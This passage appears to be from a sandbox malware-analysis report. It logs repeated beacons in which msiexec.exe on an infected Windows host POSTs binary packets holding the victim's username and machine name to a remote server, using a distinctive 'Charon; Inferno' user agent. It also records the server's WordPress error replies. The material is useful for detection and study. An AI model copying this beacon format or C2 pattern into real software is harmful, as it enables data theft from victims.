                                Sep 30, 2024 10:04:21.852639914 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                16192.168.2.449757137.184.191.21580416C:\Windows\SysWOW64\msiexec.exe
                                TimestampBytes transferredDirectionData
                                Sep 30, 2024 10:04:22.017584085 CEST241OUTPOST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:22.028390884 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:24.553879023 CEST1236INHTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:22 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:04:24.553898096 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                Sep 30, 2024 10:04:24.553910017 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                17192.168.2.449758137.184.191.21580416C:\Windows\SysWOW64\msiexec.exe
                                TimestampBytes transferredDirectionData
                                Sep 30, 2024 10:04:24.885512114 CEST241OUTPOST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:24.890573025 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:27.506804943 CEST1236INHTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:25 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:04:27.506836891 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                Sep 30, 2024 10:04:27.506848097 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                18192.168.2.449759137.184.191.21580416C:\Windows\SysWOW64\msiexec.exe
                                TimestampBytes transferredDirectionData
                                Sep 30, 2024 10:04:27.774245977 CEST241OUTPOST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:27.779108047 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:30.424139977 CEST1236INHTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:28 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:04:30.424155951 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                Sep 30, 2024 10:04:30.424168110 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                                Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                Sep 30, 2024 10:04:30.424179077 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                                Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                19192.168.2.449760137.184.191.21580416C:\Windows\SysWOW64\msiexec.exe
                                TimestampBytes transferredDirectionData
                                Sep 30, 2024 10:04:30.572695017 CEST241OUTPOST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:30.577567101 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:33.235300064 CEST1236INHTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:31 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:04:33.235312939 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                Sep 30, 2024 10:04:33.235327005 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                20192.168.2.449761137.184.191.21580416C:\Windows\SysWOW64\msiexec.exe
                                TimestampBytes transferredDirectionData
                                Sep 30, 2024 10:04:33.396735907 CEST241OUTPOST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:33.404478073 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:36.025727034 CEST1236INHTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:33 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:04:36.025752068 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                Sep 30, 2024 10:04:36.025772095 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                21192.168.2.449762137.184.191.21580416C:\Windows\SysWOW64\msiexec.exe
                                TimestampBytes transferredDirectionData
                                Sep 30, 2024 10:04:36.555095911 CEST241OUTPOST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:36.560029984 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:39.113044977 CEST1236INHTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:37 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 